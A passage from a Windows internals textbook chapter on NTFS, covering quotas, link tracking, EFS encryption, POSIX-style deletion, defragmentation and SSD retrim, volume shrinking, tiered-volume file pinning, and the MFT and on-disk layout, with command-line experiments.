defined quota limit. Thus, a user can’t circumvent his or her quota limit by
creating an empty sparse file that is larger than the quota would allow and
then fill the file with nonzero data. Similarly, whereas a 50 KB file might
compress to 10 KB, the full 50 KB is used for quota accounting.
By default, volumes don’t have quota tracking enabled. You need to use
the Quota tab of a volume’s Properties dialog box, shown in Figure 11-25,
to enable quotas, to specify default warning and limit thresholds, and to
configure the NTFS behavior that occurs when a user hits the warning or
limit threshold. The Quota Entries tool, which you can launch from this
dialog box, enables an administrator to specify different limits and behavior
for each user. Applications that want to interact with NTFS quota
management use COM quota interfaces, including IDiskQuotaControl,
IDiskQuotaUser, and IDiskQuotaEvents.
Figure 11-25 The Quota Settings dialog accessible from the volume’s
Properties window.
Link tracking
Shell shortcuts allow users to place files in their shell namespaces (on their
desktops, for example) that link to files located in the file system namespace.
The Windows Start menu uses shell shortcuts extensively. Similarly, object
linking and embedding (OLE) links allow documents from one application to
be transparently embedded in the documents of other applications. The
products of the Microsoft Office suite, including PowerPoint, Excel, and
Word, use OLE linking.
Although shell and OLE links provide an easy way to connect files with
one another and with the shell namespace, they can be difficult to manage if
a user moves the source of a shell or OLE link (a link source is the file or
directory to which a link points). NTFS in Windows includes support for a
service application called distributed link-tracking, which maintains the
integrity of shell and OLE links when link targets move. Using the NTFS
link-tracking support, if a link target located on an NTFS volume moves to
any other NTFS volume within the originating volume’s domain, the link-
tracking service can transparently follow the movement and update the link
to reflect the change.
NTFS link-tracking support is based on an optional file attribute known as
an object ID. An application can assign an object ID to a file by using the
FSCTL_CREATE_OR_GET_OBJECT_ID (which assigns an ID if one isn’t
already assigned) and FSCTL_SET_OBJECT_ID file system control codes.
Object IDs are queried with the FSCTL_CREATE_OR_GET_OBJECT_ID
and FSCTL_GET_OBJECT_ID file system control codes. The
FSCTL_DELETE_OBJECT_ID file system control code lets applications
delete object IDs from files.
Encryption
Corporate users often store sensitive information on their computers.
Although data stored on company servers is usually safely protected with
proper network security settings and physical access control, data stored on
laptops can be exposed when a laptop is lost or stolen. NTFS file permissions
don’t offer protection because NTFS volumes can be fully accessed without
regard to security by using NTFS file-reading software that doesn’t require
Windows to be running. Furthermore, NTFS file permissions are rendered
useless when an alternate Windows installation is used to access files from an
administrator account. Recall from Chapter 6 in Part 1 that the administrator
account has the take-ownership and backup privileges, both of which allow it
to access any secured object by overriding the object’s security settings.
NTFS includes a facility called Encrypting File System (EFS), which users
can use to encrypt sensitive data. The operation of EFS, as that of file
compression, is completely transparent to applications, which means that file
data is automatically decrypted when an application running in the account of
a user authorized to view the data reads it and is automatically encrypted
when an authorized application changes the data.
Note
NTFS doesn’t permit the encryption of files located in the system
volume’s root directory or in the \Windows directory because many files
in these locations are required during the boot process, and EFS isn’t
active during the boot process. BitLocker is a technology much better
suited for environments in which this is a requirement because it supports
full-volume encryption. As we will describe in the next paragraphs,
Bitlocker collaborates with NTFS for supporting file-encryption.
EFS relies on cryptographic services supplied by Windows in user mode,
so it consists of both a kernel-mode component that tightly integrates with
NTFS as well as user-mode DLLs that communicate with the Local Security
Authority Subsystem (LSASS) and cryptographic DLLs.
Files that are encrypted can be accessed only by using the private key of an
account’s EFS private/public key pair, and private keys are locked using an
account’s password. Thus, EFS-encrypted files on lost or stolen laptops can’t
be accessed using any means (other than a brute-force cryptographic attack)
without the password of an account that is authorized to view the data.
Applications can use the EncryptFile and DecryptFile Windows API
functions to encrypt and decrypt files, and FileEncryptionStatus to retrieve a
file or directory’s EFS-related attributes, such as whether the file or directory
is encrypted. A file or directory that is encrypted has the
FILE_ATTRIBUTE_ENCRYPTED flag set in its attributes, so applications
can also determine a file or directory’s encryption state with
GetFileAttributes.
POSIX-style delete semantics
The POSIX Subsystem has been deprecated and is no longer available in the
Windows operating system. The Windows Subsystem for Linux (WSL) has
replaced the original POSIX Subsystem. The NTFS file system driver has
been updated to unify the differences between I/O operations supported in
Windows and those supported in Linux. One of these differences is provided
by the Linux unlink (or rm) command, which deletes a file or a folder. In
Windows, an application can’t delete a file that is in use by another
application (which has an open handle to it); conversely, Linux usually
supports this: other processes continue to work well with the original deleted
file. To support WSL, the NTFS file system driver in Windows 10 supports a
new operation: POSIX Delete.
The Win32 DeleteFile API implements standard file deletion. The target
file is opened (a new handle is created), and then a disposition label is
attached to the file through the NtSetInformationFile native API. The label
just communicates to the NTFS file system driver that the file is going to be
deleted. The file system driver checks whether the number of references to
the FCB (File Control Block) is equal to 1, meaning that there is no other
outstanding open handle to the file. If so, the file system driver marks the file
as “deleted on close” and then returns. Only when the handle to the file is
closed does the IRP_MJ_CLEANUP dispatch routine physically remove the
file from the underlying medium.
A similar architecture is not compatible with the Linux unlink command.
The WSL subsystem, when it needs to erase a file, employs POSIX-style
deletion; it calls the NtSetInformationFile native API with the new
FileDispositionInformationEx information class, specifying a flag
(FILE_DISPOSITION_POSIX_SEMANTICS). The NTFS file system driver
marks the file as POSIX deleted by inserting a flag in its Context Control
Block (CCB, a data structure that represents the context of an open instance
of an on-disk object). It then re-opens the file with a special internal routine
and attaches the new handle (which we will call the PosixDeleted handle) to
the SCB (stream control block). When the original handle is closed, the
NTFS file system driver detects the presence of the PosixDeleted handle and
queues a work item for closing it. When the work item completes, the
Cleanup routine detects that the handle is marked as POSIX delete and
physically moves the file in the “\$Extend\$Deleted” hidden directory. Other
applications can still operate on the original file, which is no longer in the
original namespace and will be deleted only when the last file handle is
closed (the first delete request has marked the FCB as delete-on-close).
If for any unusual reason the system is not able to delete the target file
(due to a dangling reference in a defective kernel driver or due to a sudden
power interruption), the next time that the NTFS file system has the chance
to mount the volume, it checks the \$Extend\$Deleted directory and deletes
every file included in it by using standard file deletion routines.
Note
Starting with the May 2019 Update (19H1), Windows 10 now uses
POSIX delete as the default file deletion method. This means that the
DeleteFile API uses the new behavior.
EXPERIMENT: Witnessing POSIX delete
In this experiment, you’re going to witness a POSIX delete through
the FsTool application, which is available in this book’s
downloadable resources. Make sure you’re using a copy of
Windows Server 2019 (RS5). Indeed, newer client releases of
Windows implement POSIX deletions by default. Start by opening
a command prompt window. Use the /touch FsTool command-line
argument to generate a txt file that’s exclusively used by the
application:
Click here to view code image
D:\>FsTool.exe /touch d:\Test.txt
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Touching "d:\Test.txt" file... Success.
The File handle is valid... Press Enter to write to the
file.
When requested, instead of pressing the Enter key, open another
command prompt window and try to open and delete the file:
Click here to view code image
D:\>type Test.txt
The process cannot access the file because it is being used
by another process.
D:\>del Test.txt
D:\>dir Test.txt
Volume in drive D is DATA
Volume Serial Number is 62C1-9EB3
Directory of D:\
12/13/2018 12:34 AM 49 Test.txt
1 File(s) 49 bytes
0 Dir(s) 1,486,254,481,408 bytes free
As expected, you can’t open the file while FsTool has exclusive
access to it. When you try to delete the file, the system marks it for
deletion, but it’s not able to remove it from the file system
namespace. If you try to delete the file again with File Explorer,
you can witness the same behavior. When you press Enter in the
first command prompt window and you exit the FsTool application,
the file is actually deleted by the NTFS file system driver.
The next step is to use a POSIX deletion for getting rid of the
file. You can do this by specifying the /pdel command-line
argument to the FsTool application. In the first command prompt
window, restart FsTool with the /touch command-line argument
(the original file has been already marked for deletion, and you
can’t delete it again). Before pressing Enter, switch to the second
window and execute the following command:
Click here to view code image
D:\>FsTool /pdel Test.txt
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Deleting "Test.txt" file (Posix semantics)... Success.
Press any key to exit...
D:\>dir Test.txt
Volume in drive D is DATA
Volume Serial Number is 62C1-9EB3
Directory of D:\
File Not Found
In this case the Test.txt file has been completely removed from
the file system’s namespace but is still valid. If you press Enter in
the first command prompt window, FsTool is still able to write data
to the file. This is because the file has been internally moved into
the \$Extend\$Deleted hidden system directory.
Defragmentation
Even though NTFS makes efforts to keep files contiguous when allocating
blocks to extend a file, a volume’s files can still become fragmented over
time, especially if the file is extended multiple times or when there is limited
free space. A file is fragmented if its data occupies discontiguous clusters.
For example, Figure 11-26 shows a fragmented file consisting of five
fragments. However, like most file systems (including versions of FAT on
Windows), NTFS makes no special efforts to keep files contiguous (this is
handled by the built-in defragmenter), other than to reserve a region of disk
space known as the master file table (MFT) zone for the MFT. (NTFS lets
other files allocate from the MFT zone when volume free space runs low.)
Keeping an area free for the MFT can help it stay contiguous, but it, too, can
become fragmented. (See the section “Master file table” later in this chapter
for more information on MFTs.)
Figure 11-26 Fragmented and contiguous files.
To facilitate the development of third-party disk defragmentation tools,
Windows includes a defragmentation API that such tools can use to move file
data so that files occupy contiguous clusters. The API consists of file system
controls that let applications obtain a map of a volume’s free and in-use
clusters (FSCTL_GET_VOLUME_BITMAP), obtain a map of a file’s cluster
usage (FSCTL_GET_RETRIEVAL_POINTERS), and move a file
(FSCTL_MOVE_FILE).
Windows includes a built-in defragmentation tool that is accessible by
using the Optimize Drives utility (%SystemRoot%\System32\Dfrgui.exe),
shown in Figure 11-27, as well as a command-line interface,
%SystemRoot%\System32\Defrag.exe, that you can run interactively or
schedule, but that does not produce detailed reports or offer control—such as
excluding files or directories—over the defragmentation process.
Figure 11-27 The Optimize Drives tool.
The only limitation imposed by the defragmentation implementation in
NTFS is that paging files and NTFS log files can’t be defragmented. The
Optimize Drives tool is the evolution of the Disk Defragmenter, which was
available in Windows 7. The tool has been updated to support tiered
volumes, SMR disks, and SSD disks. The optimization engine is
implemented in the Optimize Drive service (Defragsvc.dll), which exposes
the IDefragEngine COM interface used by both the graphical tool and the
command-line interface.
For SSD disks, the tool also implements the retrim operation. To
understand the retrim operation, a quick introduction of the architecture of a
solid-state drive is needed. SSD disks store data in flash memory cells that
are grouped into pages of 4 to 16 KB, grouped together into blocks of
typically 128 to 512 pages. Flash memory cells can only be directly written
to when they’re empty. If they contain data, the contents must be erased
before a write operation. An SSD write operation can be done on a single
page but, due to hardware limitations, erase commands always affect entire
blocks; consequently, writing data to empty pages on an SSD is very fast but
slows down considerably once previously written pages need to be
overwritten. (In this case, first the content of the entire block is stored in
cache, and then the entire block is erased from the SSD. The overwritten
page is written to the cached block, and finally the entire updated block is
written to the flash medium.) To overcome this problem, the NTFS File
System Driver tries to send a TRIM command to the SSD controller every
time it deletes the disk’s clusters (which could partially or entirely belong to
a file). In response to the TRIM command, the SSD, if possible, starts to
asynchronously erase entire blocks. Noteworthy is that the SSD controller
can’t do anything in case the deleted area corresponds only to some pages of
the block.
The retrim operation analyzes the SSD disk and starts to send a TRIM
command to every cluster in the free space (in chunks of 1-MB size). There
are different motivations behind this:
■ TRIM commands are not always emitted. (The file system is not very
strict on trims.)
■ The NTFS File System emits TRIM commands on pages, but not on
SSD blocks. The Disk Optimizer, with the retrim operation, searches
fragmented blocks. For those blocks, it first moves valid data back to
some temporary blocks, defragmenting the original ones and inserting
even pages that belongs to other fragmented blocks; finally, it emits
TRIM commands on the original cleaned blocks.
Note
The way in which the Disk Optimizer emits TRIM commands on free
space is somewhat tricky: Disk Optimizer allocates an empty sparse file
and searches for a chunk (the size of which varies from 128 KB to 1 GB)
of free space. It then calls the file system through the
FSCTL_MOVE_FILE control code and moves data from the sparse file
(which has a size of 1 GB but does not actually contain any valid data)
into the empty space. The underlying file system actually erases the
content of the one or more SSD blocks (sparse files with no valid data
yield back chunks of zeroed data when read). This is the implementation
of the TRIM command that the SSD firmware does.
For Tiered and SMR disks, the Optimize Drives tool supports two
supplementary operations: Slabify (also known as Slab Consolidation) and
Tier Optimization. Big files stored on tiered volumes can be composed of
different Extents residing in different tiers. The Slab consolidation operation
not only defragments the extent table (a phase called Consolidation) of a file,
but it also moves the file content in congruent slabs (a slab is a unit of
allocation of a thinly provisioned disk; see the “Storage Spaces” section later
in this chapter for more information). The final goal of Slab Consolidation is
to allow files to use a smaller number of slabs. Tier Optimization moves
frequently accessed files (including files that have been explicitly pinned)
from the capacity tier to the performance tier and, vice versa, moves less
frequently accessed files from the performance tier to the capacity tier. To do
so, the optimization engine consults the tiering engine, which provides file
extents that should be moved to the capacity tier and those that should be
moved to the performance tier, based on the Heat map for every file accessed
by the user.
Note
Tiered disks and the tiering engine are covered in detail in the following
sections of the current chapter.
EXPERIMENT: Retrim an SSD volume
You can execute a Retrim on a fast SSD or NVMe volume by using
the defrag.exe /L command, as in the following example:
Click here to view code image
D:\>defrag /L c:
Microsoft Drive Optimizer
Copyright (c) Microsoft Corp.
Invoking retrim on (C:)...
The operation completed successfully.
Post Defragmentation Report:
Volume Information:
Volume size = 475.87 GB
Free space = 343.80 GB
Retrim:
Total space trimmed = 341.05 GB
In the example, the volume size was 475.87 GB, with 343.80 GB
of free space. Only 341 GB have been erased and trimmed.
Obviously, if you execute the command on volumes backed by a
classical HDD, you will get back an error. (The operation requested
is not supported by the hardware backing the volume.)
Dynamic partitioning
The NTFS driver allows users to dynamically resize any partition, including
the system partition, either shrinking or expanding it (if enough space is
available). Expanding a partition is easy if enough space exists on the disk
and the expansion is performed through the FSCTL_EXPAND_VOLUME file
system control code. Shrinking a partition is a more complicated process
because it requires moving any file system data that is currently in the area to
be thrown away to the region that will still remain after the shrinking process
(a mechanism similar to defragmentation). Shrinking is implemented by two
components: the shrinking engine and the file system driver.
The shrinking engine is implemented in user mode. It communicates with
NTFS to determine the maximum number of reclaimable bytes—that is, how
much data can be moved from the region that will be resized into the region
that will remain. The shrinking engine uses the standard defragmentation
mechanism shown earlier, which doesn’t support relocating page file
fragments that are in use or any other files that have been marked as
unmovable with the FSCTL_MARK_HANDLE file system control code (like
the hibernation file). The master file table backup ($MftMirr), the NTFS
metadata transaction log ($LogFile), and the volume label file ($Volume)
cannot be moved, which limits the minimum size of the shrunk volume and
causes wasted space.
The file system driver shrinking code is responsible for ensuring that the
volume remains in a consistent state throughout the shrinking process. To do
so, it exposes an interface that uses three requests that describe the current
operation, which are sent through the FSCTL_SHRINK_VOLUME control
code:
■ The ShrinkPrepare request, which must be issued before any other
operation. This request takes the desired size of the new volume in
sectors and is used so that the file system can block further allocations
outside the new volume boundary. The ShrinkPrepare request doesn’t
verify whether the volume can actually be shrunk by the specified
amount, but it does ensure that the amount is numerically valid and
that there aren’t any other shrinking operations ongoing. Note that
after a prepare operation, the file handle to the volume becomes
associated with the shrink request. If the file handle is closed, the
operation is assumed to be aborted.
■ The ShrinkCommit request, which the shrinking engine issues after a
ShrinkPrepare request. In this state, the file system attempts the
removal of the requested number of clusters in the most recent
prepare request. (If multiple prepare requests have been sent with
different sizes, the last one is the determining one.) The
ShrinkCommit request assumes that the shrinking engine has
completed and will fail if any allocated blocks remain in the area to be
shrunk.
■ The ShrinkAbort request, which can be issued by the shrinking engine
or caused by events such as the closure of the file handle to the
volume. This request undoes the ShrinkCommit operation by
returning the partition to its original size and allows new allocations
outside the shrunk region to occur again. However, defragmentation
changes made by the shrinking engine remain.
If a system is rebooted during a shrinking operation, NTFS restores the file
system to a consistent state via its metadata recovery mechanism, explained
later in the chapter. Because the actual shrink operation isn’t executed until
all other operations have been completed, the volume retains its original size
and only defragmentation operations that had already been flushed out to
disk persist.
Finally, shrinking a volume has several effects on the volume shadow copy
mechanism. Recall that the copy-on-write mechanism allows VSS to simply
retain parts of the file that were actually modified while still linking to the
original file data. For deleted files, this file data will not be associated with
visible files but appears as free space instead—free space that will likely be
located in the area that is about to be shrunk. The shrinking engine therefore
communicates with VSS to engage it in the shrinking process. In summary,
the VSS mechanism’s job is to copy deleted file data into its differencing
area and to increase the differencing area as required to accommodate
additional data. This detail is important because it poses another constraint on
the size to which even volumes with ample free space can shrink.
NTFS support for tiered volumes
Tiered volumes are composed of different types of storage devices and
underlying media. Tiered volumes are usually created on the top of a single
physical or virtual disk. Storage Spaces provides virtual disks that are
composed of multiple physical disks, which can be of different types (and
have different performance): fast NVMe disks, SSD, and Rotating Hard-
Disk. A virtual disk of this type is called a tiered disk. (Storage Spaces uses
the name Storage Tiers.) On the other hand, tiered volumes could be created
on the top of physical SMR disks, which have a conventional “random-
access” fast zone and a “strictly sequential” capacity area. All tiered volumes
have the common characteristic that they are composed by a “performance”
tier, which supports fast random I/O, and a “capacity” tier, which may or may
not support random I/O, is slower, and has a large capacity.
Note
SMR disks, tiered volumes, and Storage Spaces will be discussed in more
detail later in this chapter.
The NTFS File System driver supports tiered volumes in multiple ways:
■ The volume is split in two zones, which correspond to the tiered disk
areas (capacity and performance).
■ The new $DSC attribute (of type $LOGGED_UTILITY_STREAM)
specifies which tier the file should be stored in. NTFS exposes a new
“pinning” interface, which allows a file to be locked in a particular
tier (from here derives the term “pinning”) and prevents the file from
being moved by the tiering engine.
■ The Storage Tiers Management service has a central role in
supporting tiered volumes. The NTFS file system driver records ETW
“heat” events every time a file stream is read or written. The tiering
engine consumes these events, accumulates them (in 1-MB chunks),
and periodically records them in a JET database (once every hour).
Every four hours, the tiering engine processes the Heat database and
through a complex “heat aging” algorithm decides which file is
considered recent (hot) and which is considered old (cold). The tiering
engine moves the files between the performance and the capacity tiers
based on the calculated Heat data.
Furthermore, the NTFS allocator has been modified to allocate file clusters
based on the tier area that has been specified in the $DSC attribute. The
NTFS Allocator uses a specific algorithm to decide from which tier to
allocate the volume’s clusters. The algorithm operates by performing checks
in the following order:
1.
If the file is the Volume USN Journal, always allocate from the
Capacity tier.
2.
MFT entries (File Records) and system metadata files are always
allocated from the Performance tier.
3.
If the file has been previously explicitly “pinned” (meaning that the
file has the $DSC attribute), allocate from the specified storage tier.
4.
If the system runs a client edition of Windows, always prefer the
Performance tier; otherwise, allocate from the Capacity tier.
5.
If there is no space in the Performance tier, allocate from the Capacity
tier.
An application can specify the desired storage tier for a file by using the
NtSetInformationFile API with the FileDesiredStorageClassInformation
information class. This operation is called file pinning, and, if executed on a
handle of a new created file, the central allocator will allocate the new file
content in the specified tier. Otherwise, if the file already exists and is
located on the wrong tier, the tiering engine will move the file to the desired
tier the next time it runs. (This operation is called Tier optimization and can
be initiated by the Tiering Engine scheduled task or the SchedulerDefrag
task.)
Note
It’s important to note here that the support for tiered volumes in NTFS,
described here, is completely different from the support provided by the
ReFS file system driver.
EXPERIMENT: Witnessing file pinning in tiered
volumes
As we have described in the previous section, the NTFS allocator
uses a specific algorithm to decide which tier to allocate from. In
this experiment, you copy a big file into a tiered volume and
understand what the implications of the File Pinning operation are.
After the copy finishes, open an administrative PowerShell window
by right-clicking on the Start menu icon and selecting Windows
PowerShell (Admin) and use the Get-FileStorageTier command to
get the tier information for the file:
Click here to view code image
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' |
FL FileSize,
DesiredStorageTierClass, FileSizeOnPerformanceTierClass,
FileSizeOnCapacityTierClass,
PlacementStatus, State
FileSize : 4556566528
DesiredStorageTierClass : Unknown
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass : 4556566528
PlacementStatus : Unknown
State : Unknown
The example shows that the Big_Image.iso file has been
allocated from the Capacity Tier. (The example has been executed
on a Windows Server system.) To confirm this, just copy the file
from the tiered disk to a fast SSD volume. You should see a slow
transfer speed (usually between 160 and 250 MB/s depending on
the rotating disk speed):
You can now execute the “pin” request through the Set-
FileStorageTier command, like in the following example:
Click here to view code image
PS E:\> Get-StorageTier -MediaType SSD | FL FriendlyName,
Size, FootprintOnPool, UniqueId
FriendlyName : SSD
Size : 128849018880
FootprintOnPool : 128849018880
UniqueId : {448abab8-f00b-42d6-b345-c8da68869020}
PS E:\> Set-FileStorageTier -FilePath 'E:\Big_Image.iso' -
DesiredStorageTierFriendlyName
'SSD'
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' |
FL FileSize,
DesiredStorageTierClass, FileSizeOnPerformanceTierClass,
FileSizeOnCapacityTierClass,
PlacementStatus, State
FileSize : 4556566528
DesiredStorageTierClass : Performance
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass : 4556566528
PlacementStatus : Not on tier
State : Pending
The example above shows that the file has been correctly pinned
on the Performance tier, but its content is still stored in the
Capacity tier. When the Tiering Engine scheduled task runs, it
moves the file extents from the Capacity to the Performance tier.
You can force a Tier Optimization by running the Drive optimizer
through the defrag.exe /g built-in tool:
Click here to view code image
PS E:> defrag /g /h e:
Microsoft Drive Optimizer
Copyright (c) Microsoft Corp.
Invoking tier optimization on Test (E:)...
Pre-Optimization Report:
Volume Information:
Volume size = 2.22 TB
Free space = 1.64 TB
Total fragmented space = 36%
Largest free space size = 1.56 TB
Note: File fragments larger than 64MB are not
included in the fragmentation statistics.
The operation completed successfully.
Post Defragmentation Report:
Volume Information:
Volume size = 2.22 TB
Free space = 1.64 TB
Storage Tier Optimization Report:
% I/Os Serviced from Perf Tier Perf Tier
Size Required
100% 28.51 GB *
95% 22.86 GB
...
20% 2.44 GB
15% 1.58 GB
10% 873.80 MB
5% 361.28 MB
* Current size of the Performance tier: 474.98 GB
Percent of total I/Os serviced from the
Performance tier: 99%
Size of files pinned to the Performance tier: 4.21
GB
Percent of total I/Os: 1%
Size of files pinned to the Capacity tier: 0 bytes
Percent of total I/Os: 0%
The Drive Optimizer has confirmed the “pinning” of the file.
You can check again the “pinning” status by executing the Get-
FileStorageTier command and by copying the file again to an SSD
volume. This time the transfer rate should be much higher, because
the file content is entirely located in the Performance tier.
Click here to view code image
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' |
FL FileSize, DesiredStorageTierClass,
FileSizeOnPerformanceTierClass, FileSizeOnCapacityTierClass,
PlacementStatus, State
FileSize : 4556566528
DesiredStorageTierClass : Performance
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass : 4556566528
PlacementStatus : Completely on tier
State : OK
You could repeat the experiment in a client edition of Windows
10, by pinning the file in the Capacity tier (client editions of
Windows 10 allocate file’s clusters from the Performance tier by
default). The same “pinning” functionality has been implemented
into the FsTool application available in this book’s downloadable
resources, which can be used to copy a file directly into a preferred
tier.
NTFS file system driver
As described in Chapter 6 in Part I, in the framework of the Windows I/O
system, NTFS and other file systems are loadable device drivers that run in
kernel mode. They are invoked indirectly by applications that use Windows
or other I/O APIs. As Figure 11-28 shows, the Windows environment
subsystems call Windows system services, which in turn locate the
appropriate loaded drivers and call them. (For a description of system service
dispatching, see the section “System service dispatching” in Chapter 8.)
Figure 11-28 Components of the Windows I/O system.
The layered drivers pass I/O requests to one another by calling the
Windows executive’s I/O manager. Relying on the I/O manager as an
intermediary allows each driver to maintain independence so that it can be
loaded or unloaded without affecting other drivers. In addition, the NTFS
driver interacts with the three other Windows executive components, shown
in the left side of Figure 11-29, which are closely related to file systems.
The log file service (LFS) is the part of NTFS that provides services for
maintaining a log of disk writes. The log file that LFS writes is used to
recover an NTFS-formatted volume in the case of a system failure. (See the
section “Log file service” later in this chapter.)
Figure 11-29 NTFS and related components.
As we have already described, the cache manager is the component of the
Windows executive that provides systemwide caching services for NTFS and
other file system drivers, including network file system drivers (servers and
redirectors). All file systems implemented for Windows access cached files
by mapping them into system address space and then accessing the virtual
memory. The cache manager provides a specialized file system interface to
the Windows memory manager for this purpose. When a program tries to
access a part of a file that isn’t loaded into the cache (a cache miss), the
memory manager calls NTFS to access the disk driver and obtain the file
contents from disk. The cache manager optimizes disk I/O by using its lazy
writer threads to call the memory manager to flush cache contents to disk as a
background activity (asynchronous disk writing).
NTFS, like other file systems, participates in the Windows object model
by implementing files as objects. This implementation allows files to be
shared and protected by the object manager, the component of Windows that
manages all executive-level objects. (The object manager is described in the
section “Object manager” in Chapter 8.)
An application creates and accesses files just as it does other Windows
objects: by means of object handles. By the time an I/O request reaches
NTFS, the Windows object manager and security system have already
verified that the calling process has the authority to access the file object in
the way it is attempting to. The security system has compared the caller’s
access token to the entries in the access control list for the file object. (See
Chapter 7 in Part 1 for more information about access control lists.) The I/O
manager has also transformed the file handle into a pointer to a file object.
NTFS uses the information in the file object to access the file on disk.
Figure 11-30 shows the data structures that link a file handle to the file
system’s on-disk structure.
Figure 11-30 NTFS data structures.
NTFS follows several pointers to get from the file object to the location of
the file on disk. As Figure 11-30 shows, a file object, which represents a
single call to the open-file system service, points to a stream control block
(SCB) for the file attribute that the caller is trying to read or write. In Figure
11-30, a process has opened both the unnamed data attribute and a named
stream (alternate data attribute) for the file. The SCBs represent individual
file attributes and contain information about how to find specific attributes
within a file. All the SCBs for a file point to a common data structure called a
file control block (FCB). The FCB contains a pointer (actually, an index into
the MFT, as explained in the section “File record numbers” later in this
chapter) to the file’s record in the disk-based master file table (MFT), which
is described in detail in the following section.
NTFS on-disk structure
This section describes the on-disk structure of an NTFS volume, including
how disk space is divided and organized into clusters, how files are organized
into directories, how the actual file data and attribute information is stored on
disk, and finally, how NTFS data compression works.
Volumes
The structure of NTFS begins with a volume. A volume corresponds to a
logical partition on a disk, and it’s created when you format a disk or part of a
disk for NTFS. You can also create a RAID virtual disk that spans multiple
physical disks by using Storage Spaces, which is accessible through the
Manage Storage Spaces control panel snap-in, or by using Storage Spaces
commands available from the Windows PowerShell (like the New-
StoragePool command, used to create a new storage pool. A comprehensive
list of PowerShell commands for Storage Spaces is available at the following
link: https://docs.microsoft.com/en-us/powershell/module/storagespaces/)
A disk can have one volume or several. NTFS handles each volume
independently of the others. Three sample disk configurations for a 2-TB
hard disk are illustrated in Figure 11-31.
Figure 11-31 Sample disk configurations.
A volume consists of a series of files plus any additional unallocated space
remaining on the disk partition. In all FAT file systems, a volume also
contains areas specially formatted for use by the file system. An NTFS or
ReFS volume, however, stores all file system data, such as bitmaps and
directories, and even the system bootstrap, as ordinary files.
Note
The on-disk format of NTFS volumes on Windows 10 and Windows
Server 2019 is version 3.1, the same as it has been since Windows XP and
Windows Server 2003. The version number of a volume is stored in its
$Volume metadata file.
Clusters
The cluster size on an NTFS volume, or the cluster factor, is established
when a user formats the volume with either the format command or the Disk
Management MMC snap-in. The default cluster factor varies with the size of
the volume, but it is an integral number of physical sectors, always a power
of 2 (1 sector, 2 sectors, 4 sectors, 8 sectors, and so on). The cluster factor is
expressed as the number of bytes in the cluster, such as 512 bytes, 1 KB, 2
KB, and so on.
Internally, NTFS refers only to clusters. (However, NTFS forms low-level
volume I/O operations such that clusters are sector-aligned and have a length
that is a multiple of the sector size.) NTFS uses the cluster as its unit of
allocation to maintain its independence from physical sector sizes. This
independence allows NTFS to efficiently support very large disks by using a
larger cluster factor or to support newer disks that have a sector size other
than 512 bytes. On a larger volume, use of a larger cluster factor can reduce
fragmentation and speed allocation, at the cost of wasted disk space. (If the
cluster size is 64 KB, and a file is only 16 KB, then 48 KB are wasted.) Both
the format command available from the command prompt and the Format
menu option under the All Tasks option on the Action menu in the Disk
Management MMC snap-in choose a default cluster factor based on the
volume size, but you can override this size.
NTFS refers to physical locations on a disk by means of logical cluster
numbers (LCNs). LCNs are simply the numbering of all clusters from the
beginning of the volume to the end. To convert an LCN to a physical disk
address, NTFS multiplies the LCN by the cluster factor to get the physical
byte offset on the volume, as the disk driver interface requires. NTFS refers
to the data within a file by means of virtual cluster numbers (VCNs). VCNs
number the clusters belonging to a particular file from 0 through m. VCNs
aren’t necessarily physically contiguous, however; they can be mapped to
any number of LCNs on the volume.
Master file table
In NTFS, all data stored on a volume is contained in files, including the data
structures used to locate and retrieve files, the bootstrap data, and the bitmap
that records the allocation state of the entire volume (the NTFS metadata).
Storing everything in files allows the file system to easily locate and maintain
the data, and each separate file can be protected by a security descriptor. In
addition, if a particular part of the disk goes bad, NTFS can relocate the
metadata files to prevent the disk from becoming inaccessible.
The MFT is the heart of the NTFS volume structure. The MFT is
implemented as an array of file records. The size of each file record can be 1
KB or 4 KB, as defined at volume-format time, and depends on the type of
the underlying physical medium: new physical disks that have 4 KB native
sectors size and tiered disks generally use 4 KB file records, while older
disks that have 512 bytes sectors size use 1 KB file records. The size of each
MFT entry does not depend on the clusters size and can be overridden at
volume-format time through the Format /l command. (The structure of a file
record is described in the “File records” section later in this chapter.)
Logically, the MFT contains one record for each file on the volume,
including a record for the MFT itself. In addition to the MFT, each NTFS
volume includes a set of metadata files containing the information that is
used to implement the file system structure. Each of these NTFS metadata
files has a name that begins with a dollar sign ($) and is hidden. For example,
the file name of the MFT is $MFT. The rest of the files on an NTFS volume
are normal user files and directories, as shown in Figure 11-32.
Figure 11-32 File records for NTFS metadata files in the MFT.
Usually, each MFT record corresponds to a different file. If a file has a
large number of attributes or becomes highly fragmented, however, more
than one record might be needed for a single file. In such cases, the first MFT
record, which stores the locations of the others, is called the base file record.
When it first accesses a volume, NTFS must mount it—that is, read
metadata from the disk and construct internal data structures so that it can
process application file system accesses. To mount the volume, NTFS looks
in the volume boot record (VBR) (located at LCN 0), which contains a data
structure called the boot parameter block (BPB), to find the physical disk
address of the MFT. The MFT’s file record is the first entry in the table; the
second file record points to a file located in the middle of the disk called the
MFT mirror (file name $MFTMirr) that contains a copy of the first four rows
of the MFT. This partial copy of the MFT is used to locate metadata files if
part of the MFT file can’t be read for some reason.
Once NTFS finds the file record for the MFT, it obtains the VCN-to-LCN
mapping information in the file record’s data attribute and stores it into
memory. Each run (runs are explained later in this chapter in the section
“Resident and nonresident attributes”) has a VCN-to-LCN mapping and a run
length because that’s all the information necessary to locate the LCN for any
VCN. This mapping information tells NTFS where the runs containing the
MFT are located on the disk. NTFS then processes the MFT records for
several more metadata files and opens the files. Next, NTFS performs its file
system recovery operation (described in the section “Recovery” later in this
chapter), and finally, it opens its remaining metadata files. The volume is
now ready for user access.
Note
For the sake of clarity, the text and diagrams in this chapter depict a run
as including a VCN, an LCN, and a run length. NTFS actually compresses
this information on disk into an LCN/next-VCN pair. Given a starting
VCN, NTFS can determine the length of a run by subtracting the starting
VCN from the next VCN.
As the system runs, NTFS writes to another important metadata file, the
log file (file name $LogFile). NTFS uses the log file to record all operations
that affect the NTFS volume structure, including file creation or any
commands, such as copy, that alter the directory structure. The log file is
used to recover an NTFS volume after a system failure and is also described
